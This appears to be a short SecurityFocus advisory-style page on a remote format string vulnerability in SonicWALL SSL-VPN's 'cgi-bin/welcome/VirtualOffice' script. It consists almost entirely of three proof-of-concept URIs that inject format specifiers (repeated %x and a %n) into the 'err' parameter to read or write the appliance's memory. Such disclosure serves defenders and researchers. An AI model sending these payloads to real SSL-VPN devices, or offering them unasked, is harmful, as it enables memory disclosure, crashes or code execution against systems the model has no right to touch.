SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability

The following proof-of-concept URIs are available:

https://www.example.com/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n


 

Privacy Statement
Copyright 2010, SecurityFocus